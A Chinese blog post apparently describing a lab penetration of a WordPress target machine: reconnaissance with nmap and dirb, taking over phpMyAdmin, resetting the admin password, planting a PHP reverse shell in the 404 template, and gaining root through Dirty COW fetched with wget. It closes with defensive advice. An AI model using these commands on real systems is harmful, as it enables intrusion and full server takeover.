首页 > 其他分享 >渗透---WordPress网站

渗透---WordPress网站

时间:2023-05-29 20:55:54浏览次数:50  
标签:shell 漏洞 渗透 kali --- 网站 WordPress dirty 权限

WordPress简介
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统( CMS )来使用。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。

第一步,信息收集

(1)主机发现:arp-scan -l  查看同一局域网下的主机

主机发现也采用 arp-scan、netdiscover、fping等工具

 

(2)端口扫描:使用namp对发现的主机IP进行扫描

命令:nmap -sS -SV -p- -v -T4 靶机IP

 (3)dirb目录遍历

目录扫描工具还有:dirb、dirbuster、gobuster、御剑

寻找敏感文件//

例如找到了phpmyadmin的mysql数据库登陆页面,以及wp-admin管理员登陆页面

进入mysql数据库:

方法一:使用弱口令登陆,默认下未修改的账号/密码可尝试登陆:root

方法二:使用phpmyadmin多线程批量破解工具进行爆破

 在成功破解到密码后,我们发现可以修改。或者添加用户。我们为登陆的用户进行修改 ps:因为密码经过了MD5等格式的加密,不容易破解,我们为了方便可以进行修改密码

 为了方便wp-admin管理员页面顺利登陆我们可以修改密码

例如:我们将密码重新设置为‘123456’:

update wp-users set user_pass=md5("123456") where user_login= 'cleverbao';

 因为靶场问题:些许靶机部分数据段字段,例如wp的ip地址需要进行修改,才能完成此实验

将后面改成自己kali的地址

 在一系列的操作完成后,我们就可以正常的去登陆后逃跑://靶机ip/wp-admin,输入账号密码。进入后台

 第二步,权限提升

 

生成shell

方法一:利用MSF生成反弹shell:msfvenom -p php/meterpreter/reverse_tcp(生成一个webshell的类型) LHOST=Kali的IP LPORT=4444(监听端口) -o Desktop/shell.php

一旦网站执行了上传的马,我们将有控制网站的权利

方法二:

利用kali Linux自带的反弹shell

终端输入:cat /usr/share/webshells/php/php-reverse-shell.php查找木马代码

复制此shell代码到404模版,修改IP为kali地址,端口为4444

 点击外观,选择里面的编辑,选择404模版,将代码复制到404模版插入反弹shell

 获取shell

使用netcat,类似于中国菜刀,监听4444端口:nc -nlvp 4444

 

浏览器访问不存在的页面,触发404文件执行,例如http://靶机ip/?p=666

 使用命令whoami,查看当前权限

如果当前权限不是root权限需要进行提权

注:$代表一般用户权限,#代表root权限

使用命令:uname -a  // 可以查看当前系统的内核

 权限提升-漏洞概述

 

漏洞原理
Linux内核的内存子系统在处理写入时复制(copy-on-write,COW)时产生了竞争条件(race condition )。恶意用户可利用此漏洞,来获取高杠限,对只读内存映射进行写访问
竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限.

 下载漏洞到kali,发现代码是使用c语言编写的,我们到kali里面就需要用到gcc工具去编译

 下载到kali桌面并进入目录,

使用gcc编译:gcc -pthread dirty.c(文件) -o(输出) dirt(生成该工具文件) -lcrypt

我们需要该文件工具具有执行的权限:ls -l dirt    chmod +x dirty

使用python开启http服务器

python -m SimpleHTTPServer 80

 靶场那边则需要通过反弹的shell,进入靶机/tmp目录,使用wget下载dirty文件

命令为:wget http://kali的IP/dirty

 执行dirty完成提权,获得登陆信息

命令:./dirty new_password(任意密码)

 

3.3 思路总结 - 渗透全过程(红队 )
主机发现,扫描和识别端口服务,找到22、80、3306

目录扫描,找到敏感目录,包括数据库和网站后台

手工尝试登录数据库后台,修改网站账号密码

利用网站账号登录网站后台,上传网站木马( shell )

执行网站木马获取低权限shell,判断系统版本寻找提权方法

使用Dirty Cow 漏洞提权,获取管理员账号实现Root 权限

 

3.3 思路总结 - 防御全过程(蓝队 )
关闭不需要的端口,遵循最小化原则
使用常见网站CMS时,修改默认后台路径
使用PhpmyAdmin时,修改默认路径和密码
升级操作系统版本,不定时打补丁修复漏洞
关注最新漏洞情报,提升安全运维响应能力

 

3.3 思路总结-渗透工具汇总
主机扫描 : nmap、arp-scan、netdiscover

目录遍历 : dirb、dirbuster、gobuster、御剑

漏洞挖掘与利用: phpmyadmin、burp、msf、netcat

权限提升:dirty cow、gcc

 

带验证码的表单爆破工具:pkav

标签:shell,漏洞,渗透,kali,---,网站,WordPress,dirty,权限
From: https://www.cnblogs.com/aidy/p/17441636.html

相关文章

  • 渗透--WordPress网站
    WordPress简介WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用......
  • AUTOCAD二次开发系列教程02-创建实体过程的理解
    目录01案例02步骤讲解03关键类理解04总结05源码地址01案例创建一个圆usingAutodesk.AutoCAD.ApplicationServices.Core;usingAutodesk.AutoCAD.DatabaseServices;usingAutodesk.AutoCAD.Geometry;usingAutodesk.AutoCAD.Runtime;namespaceHello.Cad.App01{......
  • 思考-关于做事专注力提高
    情况概述最近几日,先是写第二篇小论文正文部分,极度的专注和高效,没有听音乐、小说等,就是安安静静的写论文,找资料,从下午睡醒到晚上一直持续。第二个现象是在初稿快结束的时候,由于求速度,很多内容都是草草了事,但也不排除是因为不知道怎么去写。第三个场景是老师返稿意见,我第一天是......
  • Generative AI 新世界 | 走进文生图(Text-to-Image)领域
    在之前的四篇“GenerativeAI新世界”中,我们带领大家一起探索了生成式AI(GenerativeAI),以及大型语言模型(LLMs)的全新世界概览。并在文本生成(TextGeneration)领域做了一些概述、相关论文解读、以及在亚马逊云科技的落地实践和动手实验。亚马逊云科技开发者社区为开发者们提供......
  • [CVPR23 Highlight] Side Adapter Network for Open-Vocabulary Semantic Segmentatio
    **摘要本文提出了一个用于开放词汇语义分割的新框架SAN,将语义分割任务建模为区域识别问题,提取maskproposals并使用CLIP对mask进行识别。SAN可以重新利用CLIP的特征,因此其本身可以非常轻量;同时网络可以端到端地进行训练,从而使SAN适应冻结的CLIP模型。本文方法需要很少的参数量,且......
  • Spider理论系列--MongoDB(二)
    六、INSERT使用insert db.集合名.insert(文档)#如果是添加数据建议使用insert插入多条数据: db.集合名.insert([文档])#注意一定要加[]否则可能只会把第一条文档插入进去db.user.insert({'name':'lisi','age':20})db.user.insert([{'name':'lisi','age':......
  • jwt原理开发,drf-jwt快速使用和自定义使用,jwt签发认证源码分析
    一眼弄懂cookieSeesiontoken区别彻底弄懂cookie,session和token区别1jwt原理1.1使用jwt认证和使用session认证的区别1.2三段式eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEf......
  • 【python基础】基本数据类型-数字类型
    Python3支持int(整型数据)、float(浮点型数据)、bool(布尔类型)1.int(整型数据)在Python3里,只有一种整数类型int,表示为长整型。像大多数语言一样,数值类型的赋值和计算都是很直观的。1.1数值运算编写程序如下所示运行结果如下所示这里需要注意的是数值的除法运算,包含两......
  • 2023ciscn-misc-国粹复现
    说明:此题给出的两个图片,a.png及k.png是分别表示的x坐标和y坐标。然后再用此坐标对题目进行画图,从而得出flag但是由于本人的代码技术有限只能借鉴大佬们的代码然后对其进行分析学习。importnumpyasnpfromPILimportImage classtest():   def__init__(self):......
  • 文献阅读-Inferring Networks of Diffusion and Influence
    Authors: ManuelGomez-Rodriguez, JureLeskovec, AndreasKrause AuthorsInfo&ClaimsACMTransactionsonKnowledgeDiscoveryfromDataVolume5Issue4ArticleNo.:21pp1–37https://doi.org/10.1145/2086737.2086741  Abstract......